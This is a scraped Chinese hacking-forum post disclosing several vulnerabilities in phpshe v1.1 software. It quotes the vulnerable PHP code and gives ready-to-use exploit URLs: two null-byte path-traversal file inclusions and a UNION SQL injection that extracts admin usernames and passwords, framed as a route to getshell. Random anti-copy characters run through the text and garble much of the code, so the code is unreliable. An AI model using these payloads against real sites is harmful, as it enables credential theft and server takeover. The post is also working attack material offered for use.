找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2068|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/" ^. f9 c/ C2 L6 z
/* Phpshe v1.1 Vulnerability& \  p& D6 z" u: A9 I. p
/* ========================* e  Z- \( v$ H& c* M1 ?' K
/* By: : Kn1f3
- Q$ i) H6 D% a( e/* E-Mail : 681796@qq.com* w8 H, C. U# g/ w3 E
/*******************************************************/, K8 z+ J& H+ U
0×00 整体大概参数传输" N/ C5 L7 `% ?) e6 K# \
0 H) L! Q0 m8 b) y7 P
0 h' _9 z4 w( @: V" C
; c$ j3 o+ m! U9 y- ^
//common.php& J$ r2 A) I& c" p( H
if (get_magic_quotes_gpc()) {
' I. A$ T. `  h8 g" O!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
5 n4 \/ A8 a' u" R$ Z7 q+ o" f!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');1 ^# j! r/ P2 V" ?9 u
}
9 t7 m1 U. U1 q% l) Jelse {+ y2 g( g2 w: ~4 j8 h, w- z
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');! j3 J) d& e. W  V' `5 U
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
, x5 |% {+ m4 z) y* ^}6 Z- K* E& X9 i
session_start();
; b4 F, X6 c, _* X!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');/ i' ]% ^1 k' P
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
( v8 ^5 r/ h0 b  @# C6 g, s4 F/ A. w: R' n$ F1 g& y
0×01 包含漏洞4 h/ H4 ?3 V6 x4 H' @* j. c2 D
6 h5 ]' _" |1 t

6 a: Z% Y$ R$ n0 r8 L% T//首页文件$ U9 z& O! N! _  }
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);8 C' Y3 R; w# m1 k. U, m4 A
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞7 C% L1 C+ T( k* h: g7 v
pe_result();  T6 s2 L: f5 P2 q5 T6 j, X
?>
% {7 G: F$ ]7 P4 x' o/ s' i8 H( E! ]//common 文件 第15行开始" L- ^; T4 C7 d9 d
url路由配置- d0 R8 {" s/ O+ h1 w; n6 f* l
$module = $mod = $act = 'index';6 U  S; y7 G) G" L0 {
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);6 m0 w8 X# [4 B* x
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);) \7 f. U3 w0 T- {. I0 Y; d( J
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
& ~) S8 A9 e. W1 X' v//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
* l4 |& Y( |$ H& [2 x( Y# V

: Z1 p* J2 X  }2 z' u
5 a% [0 w! A+ ]; P# y" d8 m4 ?
0×02 搜索注入
3 \, c, j* ^" h% f7 F6 g 3 u5 O, z  N. ~6 Y
<code id="code2">

//product.php文件
* o; [2 a0 _" v. I+ H8 [3 dcase 'list':
1 y$ e- L! q" I6 m) S8 u$category_id = intval($id);
6 z8 k: L1 [5 B/ p  {$info = $db->pe_select('category', array('category_id'=>$category_id));8 ]  p! k* t) v% C) ^$ O; K  I
//搜索
# a* W3 a( c! w) u1 E$sqlwhere = " and `product_state` = 1";2 ?/ u" t; G- F$ c
pe_lead('hook/category.hook.php');
" @' z% ^% ?3 _9 eif ($category_id) {
% y1 A  {) ~& Cwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";1 q; d' y, y' Y# r+ ?2 M
}
; `1 a& T& q" c# _' T4 H9 ~  w% Y! G$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
' }8 I2 f; [* y" Lif ($_g_orderby) {; g( @6 z( m! d4 k1 K8 x% l
$orderby = explode('_', $_g_orderby);
' _) a$ V  D% u# j4 ]  g% D6 L$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
9 ^1 E, p7 x$ R}6 x* E" K! p6 z: {" j5 {
else {7 X, J. k) a* k) v
$sqlwhere .= " order by `product_id` desc";
/ O3 P, L$ J9 \- k  ~8 d}$ Y9 v4 o+ r$ F* u8 b
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));! B: J3 H# `+ A7 R/ r+ f
//热卖排行
. O! {- c7 N& E8 |" D7 W+ I. H& G$product_hotlist = product_hotlist();' Y4 |7 [  t4 c$ q. o1 X& i
//当前路径! H; m& ]! C4 i
$nowpath = category_path($category_id);/ s% T. X& m8 Q8 u9 M
$seo = pe_seo($info['category_name']);4 l' l  e) Y, X* Y3 E
include(pe_tpl('product_list.html'));) \: ^. |; O4 u' q: R
//跟进selectall函数库
3 A  e9 z6 {& f; H/ N# qpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
/ F* P- k" F: A# v% ~) s% k- w{7 k/ \% e1 Z# r# i: v
//处理条件语句% D+ \0 B9 o) E' P( _. P
$sqlwhere = $this->_dowhere($where);
' H) u7 {% ?* Breturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);' F. i% a9 e0 N8 s8 _+ M: }7 Q
}; s& y  o8 _, B( M# w6 A
//exp
! {; h$ x9 Z1 h6 j, n5 B: n. n; dproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1! Q3 x4 p3 S/ z1 u& r% L

</code>
/ ^7 C9 _2 S! P2 D( A4 n
9 O" O. U1 g& _( {0 u0×03 包含漏洞2. F$ h# R5 b  ]  U

9 h# N) n+ T1 F# t" N<code id="code3">

//order.php

case 'pay':


' l) x/ v+ ~; V* j$order_id = pe_dbhold($_g_id);

- G5 X/ z' t. ?! H* {3 H9 D
$cache_payway = cache::get('payway');


4 `& f8 _2 c# Fforeach($cache_payway as $k => $v) {

- O9 {! W. Z% ?- ~/ P; c, o
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


" N$ ~. G  p5 T! k" lif ($k == 'bank') {


8 b, a9 z& r' p# S6 [$ m* n$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


- n# M, }; y% o! ]" e/ y}

( `; V$ \" W  z5 f7 @
}

8 t3 p$ C) c7 A( [1 p: p/ M8 M' I, P
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

& s# B1 ]# R4 ]* ]% t, Z0 M
!$order['order_id'] && pe_error('订单号错误...');

; g1 q  R, L! u" M" P2 N( T  Y
if (isset($_p_pesubmit)) {

2 r2 [& X+ p% B7 ]6 j
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

  _0 f+ A! n6 }& i- s
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

6 P/ O& h- N$ g& g6 U" B% ^
foreach ($info_list as $v) {

* ?& g! S1 @( Y+ w
$order['order_name'] .= "{$v['product_name']};";3 R1 g! ^6 t5 C, H+ v

$ {( ^& K0 b" n% U1 r& y3 h
}

2 ~+ Y, c  @3 R5 S) H% M! j0 t/ F
echo '正在为您连接支付网站,请稍后...';


9 N; [: n% Z# H( ~+ r4 Tinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

# v( |3 g9 j# ?5 E
}//当一切准备好的时候就可以进行"鸡肋包含了"

& O+ G, t4 ^2 c' S
else {


; \, c- Y5 `) ]! lpe_error('支付错误...');

# R+ z3 h! Q2 `( n! W1 B
}


- |: Z* ?: p/ p+ U/ N}


1 d9 p7 C# t+ z# I$seo = pe_seo('选择支付方式');

' d! v; ?, c  f: C! t
include(pe_tpl('order_pay.html'));

% L% v) Q# X: ?3 `, ?# m" b, d6 F' @2 z
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>8 ~- q, O2 O* R( X" h' ~
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表